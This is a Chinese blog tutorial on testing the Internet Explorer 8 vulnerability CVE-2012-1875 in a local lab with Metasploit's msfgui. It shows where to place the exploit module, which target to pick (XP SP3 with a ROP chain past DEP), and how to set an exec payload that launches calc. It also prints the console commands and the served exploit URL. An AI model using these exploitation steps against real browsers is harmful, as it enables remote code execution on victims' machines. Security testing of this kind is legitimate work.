欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

使用Metasploit测试最新的IE8漏洞(CVE-2012-1875)

程序员文章站 2022-07-01 08:47:09
本来想使用Metasploit的控制台来测试,但是控制台怎么也找不到这个exploit,暂不知道原因,后来使用msfgui来测试的。        &...
本来想使用Metasploit的控制台来测试,但是控制台怎么也找不到这个exploit,暂不知道原因,后来使用msfgui来测试的。

        1、rb文件下载地址:http://dev.metasploit.com/redmine/projects/framework/repository/revisions/6abb7bb987a11dbcda8eb611831bcb2ff65070e0/entry/modules/exploits/windows/browser/ms12_037_same_id.rb

        2、把下载回来的rb文件放到C:\metasploit\msf3\modules\exploits\magictong\cve-2012-1875.rb,我改了名,放到了magictong文件夹下面,你也可以不改名,或者放到已有的文件夹下面,但是一定要放到exploits下面,你懂的。

        3、在msfgui界面上,使用File菜单Search选项,搜索2012-1875,如图,不出意外应该是可以搜索到的啊!

使用Metasploit测试最新的IE8漏洞(CVE-2012-1875)

        4、选中搜到的条目,具体就是上面的magictong/cve-2012-1875 - Normal,然后点击Launch按钮,进入配置页面。

使用Metasploit测试最新的IE8漏洞(CVE-2012-1875)

        5、在配置页面,首先选择Targets,我的目标系统是xpsp3,我选择了IE 8 on Windows XP SP3 with msvcrt ROP,因为这个漏洞要过DEP,因此利用会麻烦点。

使用Metasploit测试最新的IE8漏洞(CVE-2012-1875)

        6、然后选择Payload,这里选择了exec,启动calc(计算器)。SRVHOST里面输入本机(MSF所在的机器,不是有漏洞的机器,如果有漏洞机器就是MSF所在的机器,则输入127.0.0.1即可)的局域网IP,如果直接在本机测试,输入127.0.0.1即可。

使用Metasploit测试最新的IE8漏洞(CVE-2012-1875)

        7、然后点击Run inConsole ,等待,直到msfgui的主界面下console TAB页打出如下信息:

 

msf  exploit(cve-2012-1875) > use exploit/magictong/cve-2012-1875
msf  exploit(cve-2012-1875) > set TARGET 1
TARGET => 1
msf  exploit(cve-2012-1875) > set PAYLOAD windows/exec
msf  exploit(cve-2012-1875) > set CMD calc
PAYLOAD => windows/exec
CMD => calc
msf  exploit(cve-2012-1875) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf  exploit(cve-2012-1875) > exploit
[*] Exploit running as background job.
[*] Using URL: http://127.0.0.1:8080/V6rnzyBsbnnmWIv
[*] Server started.


 

        8、现在你就可以使用http://127.0.0.1:8080/V6rnzyBsbnnmWIv在本机进行测试了